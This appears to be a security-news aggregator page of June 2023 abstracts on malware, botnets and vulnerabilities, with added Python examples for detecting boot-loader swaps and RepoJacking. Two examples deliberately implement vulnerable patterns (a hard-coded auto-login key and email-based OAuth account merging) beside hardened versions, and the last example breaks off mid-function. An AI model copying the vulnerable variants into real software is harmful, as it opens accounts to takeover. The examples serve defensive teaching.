A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS, which contains the name in its "User-Agent" string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint highlighted IcedID's abandoning of banking fraud features to focus solely on malware delivery. Bumblebee, notably, is a replacement for another loader called BazarLoader, which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including Conti, Emotet, and IcedID. Deep Instinct's source code analysis of PindOS shows that it contains comments in Russian, raising the possibility of a continued partnership betweenThe Hacker News
June 23, 2023 – Vulnerabilities
Fortinet fixes critical FortiNAC RCE, install updates asap Full Text
Abstract
Fortinet addressed a critical remote command execution vulnerability, tracked as CVE-2023-33299, affecting its FortiNAC solution. FortiNAC is a network access control (NAC) solution designed by Fortinet that is used by organizations to secure and control...Security Affairs
June 23, 2023 – Botnet
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
The botnet has been observed targeting IoT devices, routers, DVRs, access control systems, and solar power generation monitoring systems from brands such as D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek.Cyware
June 23, 2023 – Government
NSA Releases Guide to Combat Powerful BlackLotus Bootkit Targeting Windows Systems Full Text
Abstract
The U.S. National Security Agency (NSA) on Thursday released guidance to help organizations detect and prevent infections of a Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus. To that end, the agency is recommending that "infrastructure owners take action by hardening user executable policies and monitoring the integrity of the boot partition." BlackLotus is an advanced crimeware solution that was first spotlighted in October 2022 by Kaspersky. It is a UEFI bootkit capable of bypassing Windows Secure Boot protections, and samples of the malware have since emerged in the wild. This is accomplished by taking advantage of a known Windows flaw called Baton Drop (CVE-2022-21894, CVSS score: 4.4) present in vulnerable boot loaders that have not been added to the Secure Boot DBX revocation list. The vulnerability was addressed by Microsoft in January 2022. This loophole could be exploited by threat actors to replace fully patched boot loaders with vulnerable vThe Hacker News
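One way to act on the NSA's "monitoring the integrity of the boot partition" advice, as an added example that is neither the agency's tooling nor anything from the advisory: hash the loaders on a mounted EFI System Partition, keep a baseline, and diff against it on every run, so a patched boot loader that has been swapped for an older signed one (the Baton Drop technique described above) shows up as a changed file, and a dropped-in extra loader as an added one. The watched file suffixes, the fake ESP layout and the file contents in the self-test are constructed for this example. On Windows, `mountvol S: /S` mounts the ESP at S:; on most Linux distributions it is already mounted at /boot/efi.

```python
"""ESP integrity baseline/diff. Added example, not NSA tooling: hashes the boot
loaders on a mounted EFI System Partition, stores a baseline, and reports files
that were added, removed or replaced. Paths and bytes in the self-test are
constructed, not taken from any real malware sample."""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

WATCHED_SUFFIXES = {".efi", ".cfg", ".bin"}   # assumption: loaders and their configs


def hash_esp(root: Path) -> Dict[str, str]:
    """Relative path -> SHA-256. Keys are lower-cased with forward slashes because
    the ESP is FAT, which is case-insensitive."""
    manifest: Dict[str, str] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES:
            rel = p.relative_to(root).as_posix().lower()
            manifest[rel] = hashlib.sha256(p.read_bytes()).hexdigest()
    return manifest


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def save_baseline(manifest: Dict[str, str], path: Path) -> None:
    path.write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_baseline(path: Path) -> Dict[str, str]:
    return json.loads(path.read_text())


def check(esp_root: Path, baseline_file: Path) -> Dict[str, List[str]]:
    """First run writes the baseline and returns an empty diff; later runs diff
    the live ESP against it. Keep the baseline off the ESP (ideally off-host),
    otherwise a bootkit with write access to the partition can rewrite it too."""
    current = hash_esp(esp_root)
    if not baseline_file.exists():
        save_baseline(current, baseline_file)
        return diff_manifests(current, current)
    return diff_manifests(load_baseline(baseline_file), current)


def simulate_loader_swap() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a fake ESP, then emulate a loader rollback
    (patched bootmgfw.efi replaced by an older signed build) plus an extra
    loader dropped next to it, and return what check() reports."""
    with tempfile.TemporaryDirectory() as tmp:
        esp = Path(tmp, "esp")
        boot = esp / "EFI" / "Microsoft" / "Boot"
        boot.mkdir(parents=True)
        (boot / "bootmgfw.efi").write_bytes(b"constructed: patched bootmgfw 2023")
        (boot / "BCD").write_bytes(b"constructed: bcd store")          # not a watched suffix
        baseline = Path(tmp, "esp-baseline.json")
        assert check(esp, baseline) == {"added": [], "removed": [], "changed": []}
        # the attack: roll the loader back and add one of the attacker's own
        (boot / "bootmgfw.efi").write_bytes(b"constructed: vulnerable bootmgfw 2021")
        (boot / "grubx64.efi").write_bytes(b"constructed: attacker-controlled loader")
        return check(esp, baseline)


if __name__ == "__main__":
    print(json.dumps(simulate_loader_swap(), indent=1))
```

A baseline diff only says that something changed. Deciding whether the replacement is one of the revoked-but-not-in-DBX loaders the advisory is about means comparing the new hash against Microsoft's published DBX update or a known-good build of the same Windows release, which is a separate, vendor-data-driven step.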
June 23, 2023 – Government
Federal incentives could help utilities overcome major cybersecurity hurdle: money Full Text
Abstract
A new cyber incentive framework from the Federal Energy Regulatory Commission could help utilities adapt to new threats at a faster pace, by providing flexibility for them to invest in pre-qualified cybersecurity measures.Cyware
June 23, 2023 – Cryptocurrency
New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices Full Text
Abstract
Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said. "The backdoor also installs a patched version of OpenSSH on affected devices, allowing threat actors to hijack SSH credentials, move laterally within the network, and conceal malicious SSH connections." To pull off the scheme, misconfigured Linux hosts are brute-forced to gain initial access, following which the threat actors move to disable shell history and fetch a trojanized version of OpenSSH from a remote server. The rogue OpenSSH package is configured to install and launch the backdoor, a shell script that allows the attackers to distribute additional payloads aThe Hacker News
June 23, 2023 – Policy and Law
Data Breach Lawsuit Alleges Mismanagement of 3rd-Party Risk Full Text
Abstract
A proposed federal class action lawsuit alleges that patient debt collection software firm Intellihartx was negligent in its handling of third-party risk, contributing to a breach affecting nearly 490,000 individuals.Cyware
June 23, 2023 – Vulnerabilities
More than a million GitHub repositories potentially vulnerable to RepoJacking Full Text
Abstract
Researchers reported that millions of GitHub repositories are likely vulnerable to an attack called RepoJacking. A study conducted by Aqua researchers revealed that millions of GitHub repositories are potentially vulnerable to RepoJacking. In...Security Affairs
June 22, 2023 – Vulnerabilities
GitHub Dataset Research Reveals Millions Potentially Vulnerable to RepoJacking Full Text
Abstract
RepoJacking is a security vulnerability that may lead to code execution on organizations' internal or customer environments. Millions of GitHub repositories are potentially vulnerable to it, including popular organizations such as Google and Lyft.Cyware
June 22, 2023 – Phishing
MULTI#STORM Campaign Targets India and U.S. with Remote Access Trojans Full Text
Abstract
A new phishing campaign codenamed MULTI#STORM has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems. "The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said. "Both are used for command-and-control during different stages of the infection chain." The multi-stage attack chain commences when an email recipient clicks the embedded link pointing to a password-protected ZIP file ("REQUEST.zip") hosted on Microsoft OneDrive with the password "12345." Extracting the archive file reveals a heavily obfuscated JavaScript file ("REQUEST.js") that, when double clicked, activates the infection by executing two PowerShell commands that are responsible for retrieving two separate payloads from OneDriThe Hacker News
June 22, 2023 – Malware
Researchers Reverse Engineer Flutter-based Fluhorse Android Malware Full Text
Abstract
The malware poses as a legitimate app for an electronic toll system used in Southern Asia and steals user credentials and 2FA codes. The malware is distributed via email phishing campaigns and has been downloaded over 100,000 times.Cyware
June 22, 2023 – Education
Generative-AI apps & ChatGPT: Potential risks and mitigation strategies Full Text
Abstract
Losing sleep over Generative-AI apps? You're not alone or wrong. According to the Astrix Security Research Group, mid-size organizations already have, on average, 54 Generative-AI integrations to core systems like Slack, GitHub and Google Workspace, and this number is only expected to grow. Continue reading to understand the potential risks and how to minimize them. Book a Generative-AI Discovery session with Astrix Security's experts (free - no strings attached - agentless & zero friction) "Hey ChatGPT, review and optimize our source code" "Hey Jasper.ai, generate a summary email of all our net new customers from this quarter" "Hey Otter.ai, summarize our Zoom board meeting" In this era of financial turmoil, businesses and employees alike are constantly looking for tools to automate work processes and increase efficiency and productivity by connecting third-party apps to core business systems such as Google Workspace, Slack and GitHubThe Hacker News
June 22, 2023 – Botnet
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai...Security Affairs
June 22, 2023 – Breach
Third-Party Vendor Exposes 3CX Data via Unsecured Elasticsearch and Kibana Instances Full Text
Abstract
A third-party vendor of 3CX left an open server and exposed sensitive data. Attackers could use the exposed call metadata, license keys, and database connection strings to spy on 3CX clients or launch more sophisticated attacks.Cyware
June 22, 2023 – General
Alert: Million of GitHub Repositories Likely Vulnerable to RepoJacking Attack Full Text
Abstract
Millions of software repositories on GitHub are likely vulnerable to an attack called RepoJacking, a new study has revealed. This includes repositories from organizations such as Google, Lyft, and several others, Massachusetts-based cloud-native security firm Aqua said in a Wednesday report. The supply chain vulnerability, also known as dependency repository hijacking, is a class of attacks that makes it possible to take over retired organization or user names and publish trojanized versions of repositories to run malicious code. "When a repository owner changes their username, a link is created between the old name and the new name for anyone who downloads dependencies from the old repository," researchers Ilay Goldman and Yakir Kadkoda said. "However, it is possible for anyone to create the old username and break this link." Alternatively, a similar scenario could arise when a repository ownership is transferred to another user and the original accountThe Hacker News
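The rename-and-redirect mechanism described above, as an added example that is not part of the Aqua report or of any GitHub tooling: a scanner that pulls github.com references out of a dependency manifest and classifies each one by whether the path now redirects to a different owner and whether the old owner name is free to register. The resolver interface, the FAKE_GITHUB fixture and the sample manifest are constructed for this example; a real deployment would back resolve() with an unauthenticated HEAD request to https://github.com/<path> with redirects disabled, mapping a 301 Location header to the new path and a 404 to "does not exist".

```python
"""RepoJacking exposure check. Added example, not Aqua's tooling: scans a
dependency manifest for github.com references and asks a resolver whether the
owner/repo path redirects to a new owner while the old owner name is free to
re-register, which is the takeover condition described in the research."""
import re
from typing import Callable, Dict, List, Optional, Tuple

# resolve(path) -> (redirect_target_or_None, exists). Back this with a HEAD
# request to github.com with redirects disabled in real use.
Resolver = Callable[[str], Tuple[Optional[str], bool]]

# Matches go.mod lines, pip VCS URLs, npm "github:owner/repo" shorthands and
# plain clone URLs. Owner names are alnum/hyphen; repos may also contain . and _
GITHUB_REF = re.compile(
    r"(?:github\.com[/:]|github:)([A-Za-z0-9-]+)/([A-Za-z0-9_.-]+?)(?:\.git)?(?![A-Za-z0-9_.-])"
)


def extract_github_refs(manifest: str) -> List[Tuple[str, str]]:
    seen, refs = set(), []
    for owner, repo in GITHUB_REF.findall(manifest):
        key = (owner.lower(), repo.lower())
        if key not in seen:
            seen.add(key)
            refs.append((owner, repo))
    return refs


def classify(owner: str, repo: str, resolve: Resolver) -> str:
    """'missing'                - path is gone; builds already fail loudly
    'ok'                     - no redirect, or renamed within the same owner
    'redirected-owner-taken' - redirects to a new owner; old name held by someone
    'repojackable'           - redirects to a new owner AND the old owner name is
                               free: an attacker can register it, recreate <repo>,
                               and the redirect your builds rely on serves their code"""
    target, exists = resolve(f"{owner}/{repo}")
    if not exists:
        return "missing"
    if target is None or target.split("/")[0].lower() == owner.lower():
        return "ok"
    _, old_owner_exists = resolve(owner)
    return "redirected-owner-taken" if old_owner_exists else "repojackable"


def find_repojacking_candidates(manifest: str, resolve: Resolver) -> Dict[str, str]:
    return {f"{o}/{r}": classify(o, r, resolve) for o, r in extract_github_refs(manifest)}


# --- constructed fixture standing in for GitHub's answers (no real accounts) ---
FAKE_GITHUB = {
    "acme/widget": ("acme-inc/widget", True),  # org renamed; "acme" never re-registered
    "acme": (None, False),
    "bob/tool": ("robert/tool", True),         # user renamed; someone else now holds "bob"
    "bob": (None, True),
    "carol/lib": (None, True),                 # never moved
    "dave/old": (None, False),                 # deleted outright
}


def fake_resolve(path: str) -> Tuple[Optional[str], bool]:
    return FAKE_GITHUB.get(path, (None, False))


SAMPLE_MANIFEST = """\
require github.com/acme/widget v1.2.0
git+https://github.com/bob/tool.git@v2#egg=tool
"lib": "github:carol/lib"
RUN git clone https://github.com/dave/old.git /opt/old
"""

if __name__ == "__main__":
    for dep, verdict in find_repojacking_candidates(SAMPLE_MANIFEST, fake_resolve).items():
        print(f"{verdict:24} {dep}")
```

The "redirected-owner-taken" verdict deserves a look as well: the redirect still works today, but the old name belongs to an account that can create a repository of the same name and break it. The remediation is the same in every case: reference the dependency by its new canonical path, and pin it to a commit hash or vendor it, rather than trusting a redirect.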
June 22, 2023 – Malware
Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure Full Text
Abstract
The proof-of-concept (PoC) exploit code for high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability,...Security Affairs
June 22, 2023 – General
British law firms warned to upgrade cyber defenses against ransomware attacks Full Text
Abstract
Law firms in Britain were warned on Thursday to upgrade their cyber defenses in the wake of a number of ransomware attacks that led to sensitive and potentially legally privileged information being stolen by criminals and published online.Cyware
June 22, 2023 – Hacker
Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware Full Text
Abstract
The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new research shared with The Hacker News. The cybersecurity company, which found evidence of USB malware infections in Myanmar, South Korea, Great Britain, India, and Russia, said the findings are the result of a cyber incident that it investigated at an unnamed European hospital in early 2023. The probe found that the entity was not directly targeted by the adversary but rather suffered a breach via an employee's USB drive, which became infected when it was plugged into a colleague's computer at a conference in Asia. "Consequently, upon returning to the healthcare instituThe Hacker News
June 22, 2023 – Breach
Norton parent firm Gen Digital, was victim of a MOVEit ransomware attack too Full Text
Abstract
Norton parent firm, Gen Digital, was the victim of a ransomware attack that exploited the recently disclosed MOVEit zero-day vulnerability. Gen Digital Inc. (formerly Symantec Corporation and NortonLifeLock) is a multinational software company that...Security Affairs
June 22, 2023 – Cryptocurrency
Ukrainian Police Disrupt Cryptocurrency Scam Aimed at Canada Full Text
Abstract
Ukrainian and Canadian authorities conducted a joint operation to disrupt the two call centers and confiscate computer equipment, mobile phones, SIM cards, cars, and cash.Cyware
June 22, 2023 – Education
Unveiling the Unseen: Identifying Data Exfiltration with Machine Learning Full Text
Abstract
Why Data Exfiltration Detection is Paramount? The world is witnessing an exponential rise in ransomware and data theft employed to extort companies. At the same time, the industry faces numerous critical vulnerabilities in database software and company websites. This evolution paints a dire picture of data exposure and exfiltration that every security leader and team is grappling with. This article highlights this challenge and expounds on the benefits that Machine Learning algorithms and Network Detection & Response (NDR) approaches bring to the table. Data exfiltration often serves as the final act of a cyberattack, making it the last window of opportunity to detect the breach before the data is made public or is used for other sinister activities, such as espionage. However, data leakage isn't only an aftermath of cyberattacks, it can also be a consequence of human error. While prevention of data exfiltration through security controls is ideal, the escalating complexity aThe Hacker News
June 22, 2023 – Vulnerabilities
Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari Full Text
Abstract
Apple rolled out security updates to address actively exploited zero-day flaws in iOS, iPadOS, macOS, watchOS, and Safari. Apple addressed a set of vulnerabilities in iOS, iPadOS, macOS, watchOS, and the Safari browser that were actively exploited...Security Affairs
June 22, 2023 – Hacker
Russian hacking group puts fresh emphasis on stealing credentials Full Text
Abstract
These attacks by APT29 (aka Cozy Bear, Nobelium, or Midnight Blizzard) are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries.Cyware
June 22, 2023 – Vulnerabilities
Critical Flaw Found in WordPress Plugin for WooCommerce Used by 30,000 Websites Full Text
Abstract
A critical security flaw has been disclosed in the WordPress "Abandoned Cart Lite for WooCommerce" plugin that's installed on more than 30,000 websites. "This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met," Defiant's Wordfence said in an advisory. Tracked as CVE-2023-2986, the shortcoming has been rated 9.8 out of 10 for severity on the CVSS scoring system. It impacts all versions of the plugin up to and including version 5.14.2. The problem, at its core, is a case of authentication bypass that arises as a result of insufficient encryption protections that are applied when customers are notified when they have abandoned their shopping carts on e-commerce sites without completing the purchase. Specifically, the encryption key is hard-coded in the plugin, thereby allowingThe Hacker News
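The hard-coded-key failure described above in its generic form, as an added example rather than the plugin's own code: a constructed auto-login token scheme whose only secret ships inside the plugin, so anyone who downloads the plugin zip can mint a link for any user ID, beside a hardened variant with a per-site secret, an expiry, single use, and a refusal to auto-log-in privileged roles (the "high-level users" case in the advisory). The token layout, the key, the role names and the HMAC construction are assumptions made for this example and stand in for whatever encryption the plugin used.

```python
"""Abandoned-cart auto-login links: hard-coded key vs. hardened. Added example,
not the plugin's code; token format and key are constructed for illustration."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Callable, Optional, Set


def _b64u(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64u(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _sign(secret: bytes, payload: bytes) -> str:
    return _b64u(payload) + "." + _b64u(hmac.new(secret, payload, hashlib.sha256).digest())


def _verify(secret: bytes, token: str) -> Optional[bytes]:
    try:
        data, sig = token.split(".", 1)
        payload, mac = _unb64u(data), _unb64u(sig)
    except Exception:
        return None
    expect = hmac.new(secret, payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(expect, mac) else None


# --- vulnerable: one key shipped inside the plugin, identical on every site ---
HARDCODED_KEY = b"constructed-key-baked-into-the-plugin"   # anyone with the zip has it


def mint_vulnerable(user_id: int) -> str:
    return _sign(HARDCODED_KEY, str(user_id).encode())


def login_vulnerable(token: str) -> Optional[int]:
    payload = _verify(HARDCODED_KEY, token)
    try:
        return int(payload.decode()) if payload else None   # session for that user, no questions asked
    except ValueError:
        return None


# --- hardened: per-site secret, expiry, single use, customers only ---
SITE_SECRET = secrets.token_bytes(32)   # generated at install; lives in the DB/env, not in code
PRIVILEGED = {"administrator", "shop_manager", "editor"}
_consumed: Set[str] = set()             # stand-in for a DB table of burned nonces


def mint_hardened(user_id: int, role: str, ttl: int = 3600,
                  now: Optional[float] = None, secret: bytes = SITE_SECRET) -> str:
    if role in PRIVILEGED:
        raise ValueError("no auto-login links for privileged roles")
    issued = now if now is not None else time.time()
    payload = json.dumps({"uid": user_id, "exp": int(issued + ttl), "nonce": secrets.token_hex(16)},
                         separators=(",", ":")).encode()
    return _sign(secret, payload)


def login_hardened(token: str, role_of: Callable[[int], str],
                   now: Optional[float] = None, secret: bytes = SITE_SECRET) -> Optional[int]:
    payload = _verify(secret, token)
    if payload is None:
        return None
    try:
        claims = json.loads(payload)
        uid, exp, nonce = int(claims["uid"]), int(claims["exp"]), str(claims["nonce"])
    except (ValueError, KeyError, TypeError):
        return None
    current = now if now is not None else time.time()
    # role is re-checked server-side: a customer promoted to admin after the
    # link was mailed must not be able to use it
    if exp < current or nonce in _consumed or role_of(uid) in PRIVILEGED:
        return None
    _consumed.add(nonce)                 # burn the link before issuing the session
    return uid
```

With the vulnerable scheme, mint_vulnerable(1) run by anyone who read the plugin source yields a working login link for user ID 1; with the hardened scheme a token minted under a guessed key fails verification, a replayed link is rejected, an expired one is rejected, and a link for an administrator is rejected even if it was somehow issued.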
June 22, 2023 – Malware
Analyzing the TriangleDB implant used in Operation Triangulation Full Text
Abstract
Kaspersky provided more details about Operation Triangulation, including the exploitation chain and the implant used by the threat actors. Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed...Security Affairs
June 22, 2023 – Outage
Hawaiʻi Community College Hit with NoEscape Ransomware Attack Full Text
Abstract
Hawaiʻi Community College is the latest university to deal with a ransomware attack, announcing on Tuesday night that it was forced to shut off its network and contact federal authorities about the incident.Cyware
June 22, 2023 – Vulnerabilities
Zero-Day Alert: Apple Releases Patches for Actively Exploited Flaws in iOS, macOS, and Safari Full Text
Abstract
Apple on Wednesday released a slew of updates for iOS, iPadOS, macOS, watchOS, and Safari browser to address a set of flaws it said were actively exploited in the wild. This includes a pair of zero-days that have been weaponized in a mobile surveillance campaign called Operation Triangulation that has been active since 2019. The exact threat actor behind the activity is not known. CVE-2023-32434 - An integer overflow vulnerability in the Kernel that could be exploited by a malicious app to execute arbitrary code with kernel privileges. CVE-2023-32435 - A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content. The iPhone maker said it's aware that the two issues "may have been actively exploited against versions of iOS released before iOS 15.7," crediting Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin for reporting them. The advisory comes as the RussiaThe Hacker News
June 22, 2023 – General
CISOs’ New Stressors Brought on by Digitalization: Report Full Text
Abstract
Salt Security surveyed an international selection of 300 CISOs and CSOs to examine the cybersecurity ramifications of digitalization – and it is worth noting that almost 90% of them said that digital transformation introduces unforeseen risks.Cyware
June 22, 2023 – Malware
RDStealer Compromises Remote Desktop Drives for Data Theft Full Text
Abstract
Researchers took the wraps off of a year-long cyberattack campaign deploying a custom Golang malware called RDStealer. The malware strain focuses on stealing credentials and extracting data from compromised hosts. Not by coincidence, all the compromised machines were Dell-manufactured devices.Cyware
June 21, 2023 – Hacker
ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks Full Text
Abstract
The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previously undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (ASEC) said in a technical report. "The API key value required for command communication was saved in a GitHub repository." ScarCruft is a state-sponsored outfit with links to North Korea's Ministry of State Security (MSS). It's known to be active since at least 2012. Attack chains mounted by the group entail the use of spear-phishing lures to deliver RokRAT, although it has leveraged a wide range of other custom tools to harvest sensitive information. In the latest intrusion detected by ASEC, the email comes bearing a Microsoft Compiled HTML Help (.CHM) file --The Hacker News
June 21, 2023
Russia-linked APT28 hacked Roundcube email servers of Ukrainian entities Full Text
Abstract
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations. A joint investigation conducted by Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked...Security Affairs
June 21, 2023 – Vulnerabilities
Critical WordPress Plugin Vulnerabilities Impact Thousands of Sites Full Text
Abstract
The first security defect, tracked as CVE-2023-2986 (CVSS score 9.8/10), impacts the Abandoned Cart Lite for WooCommerce, a plugin that notifies customers who did not complete the purchase process, and which has more than 30,000 active installations.Cyware
June 21, 2023 – Malware
New Report Exposes Operation Triangulation’s Spyware Implant Targeting iOS Devices Full Text
Abstract
More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation. Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers. The Russian cybersecurity company has codenamed the backdoor TriangleDB. "The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today. "It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again." Operation TriangulationThe Hacker News
June 21, 2023 – Botnet
New Condi DDoS botnet targets TP-Link Wi-Fi routers Full Text
Abstract
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers. Fortinet FortiGuard Labs Researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability...Security Affairs
June 21, 2023 – Ransomware
May ransomware activity rises behind 8base, LockBit gangs Full Text
Abstract
LockBit was the most active group last month, but NCC Group researchers were surprised by 8base, which started listing victims from attacks that occurred beginning in April 2022.Cyware
June 21, 2023 – Education
Startup Security Tactics: Friction Surveys Full Text
Abstract
When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: (1) reduce the risk of information security incidents; (2) increase trust in Vanta's information security program; (3) reduce the friction caused by information security controls; (4) use security expertise to support the business. In this article, I'm going to focus on number three: reducing friction. Declaring your intentions: there is value in making "reducing friction" an explicit goal of your security program. It sets the right tone with your counterparts across the organization, and is one step toward building a positive security culture. The first time I presented those outcomes in a company-wide forum, I received a Slack message from a senior leader who had just joined the company: "Fantastic to hear about the security team's focus on removing invisible security controls. Excellent philosophy for the security team [...] it's just awesome too many security teams viThe Hacker News
June 21, 2023 – Vulnerabilities
Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild Full Text
Abstract
VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks. VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (formerly...Security Affairs
June 21, 2023 – General
US and European IT decision-makers have different cloud security priorities Full Text
Abstract
The growing adoption of cloud has elevated cloud security fear for IT teams, as they grapple with the challenges and concerns arising from the widespread use of complex cloud environments while diligently addressing them, according to SUSE.Cyware
June 21, 2023 – Vulnerabilities
Critical ‘nOAuth’ Flaw in Microsoft Azure AD Enabled Complete Account Takeover Full Text
Abstract
A security shortcoming in Microsoft Azure Active Directory (AD) Open Authorization (OAuth) process could have been exploited to achieve full account takeover, researchers said. California-based identity and access management service Descope, which discovered and reported the issue in April 2023, dubbed it nOAuth. "nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications," Omer Cohen, chief security officer at Descope, said. The misconfiguration has to do with how a malicious actor can modify email attributes under "Contact Information" in the Azure AD account and exploit the "Log in with Microsoft" feature to hijack a victim account. To pull off the attack, all an adversary has to do is to create and access an Azure AD admin account and modify their email address to that of a victim and take advantage of the single sign-on scheme on a vulnerable app or website. "If the app merges uThe Hacker News
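What "merging on the email attribute" looks like in application code, as an added example that is neither Descope's nor Microsoft's: a vulnerable "Log in with Microsoft" handler that joins the incoming identity to a local account by email, beside a hardened one that keys on the token's issuer and subject and refuses to silently attach to an existing local account. The claims are constructed dicts standing in for an already signature- and audience-verified ID token; the tenant IDs, subjects and addresses are made up, and the in-memory account store is a stand-in for the application's user table.

```python
"""nOAuth-style account merge, vulnerable and hardened. Added example, not
Descope's or Microsoft's code. Claims are constructed; signature, audience and
expiry checks are assumed to have already happened upstream."""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class User:
    user_id: str
    email: str
    oidc_issuer: Optional[str] = None   # tenant-scoped issuer URL
    oidc_subject: Optional[str] = None  # 'sub': stable per app+user, not user-editable


class LinkRequiresVerification(Exception):
    """Raised when an IdP login would attach to an existing local account."""


class AccountStore:
    def __init__(self) -> None:
        self.users: Dict[str, User] = {}
        self._seq = 0

    def new_user(self, email: str, issuer: Optional[str] = None,
                 subject: Optional[str] = None) -> User:
        self._seq += 1
        user = User(f"u-{self._seq}", email, issuer, subject)
        self.users[user.user_id] = user
        return user

    def by_email(self, email: str) -> Optional[User]:
        return next((u for u in self.users.values() if u.email.lower() == email.lower()), None)

    def by_oidc(self, issuer: str, subject: str) -> Optional[User]:
        return next((u for u in self.users.values()
                     if (u.oidc_issuer, u.oidc_subject) == (issuer, subject)), None)


def login_vulnerable(store: AccountStore, claims: dict) -> User:
    # The pattern nOAuth abuses: the IdP login is merged into whichever local
    # account has the same email. In Azure AD the 'email' claim is a free-text
    # attribute a tenant admin can set, so it proves nothing about mailbox control.
    user = store.by_email(claims["email"])
    if user is None:
        user = store.new_user(claims["email"], claims["iss"], claims["sub"])
    return user


def login_hardened(store: AccountStore, claims: dict) -> User:
    # Identity is (iss, sub). Email is display data, never a join key.
    user = store.by_oidc(claims["iss"], claims["sub"])
    if user is not None:
        return user
    if store.by_email(claims.get("email", "")):
        # An existing local account already has that address: do not auto-link.
        # Require proof of mailbox control (mailed link, or linking from an
        # already-authenticated session) before merging.
        raise LinkRequiresVerification(claims["email"])
    return store.new_user(claims.get("email", ""), claims["iss"], claims["sub"])


def is_blocked(store: AccountStore, claims: dict) -> bool:
    try:
        login_hardened(store, claims)
        return False
    except LinkRequiresVerification:
        return True


# Constructed tokens: victim's own tenant vs. an attacker-controlled tenant in
# which the attacker set their account's email to the victim's address.
VICTIM_TENANT = "https://login.microsoftonline.com/11111111-1111-1111-1111-111111111111/v2.0"
ATTACKER_TENANT = "https://login.microsoftonline.com/22222222-2222-2222-2222-222222222222/v2.0"
VICTIM_CLAIMS = {"iss": VICTIM_TENANT, "sub": "victim-sub-AAA", "email": "ceo@victim.example"}
ATTACKER_CLAIMS = {"iss": ATTACKER_TENANT, "sub": "attacker-sub-ZZZ",
                   "email": "ceo@victim.example",
                   "preferred_username": "mallory@attacker.example"}


def demo() -> dict:
    vuln = AccountStore()
    victim = vuln.new_user("ceo@victim.example")        # signed up earlier with a password
    hijacked = login_vulnerable(vuln, ATTACKER_CLAIMS).user_id == victim.user_id

    hard = AccountStore()
    hard.new_user("ceo@victim.example")
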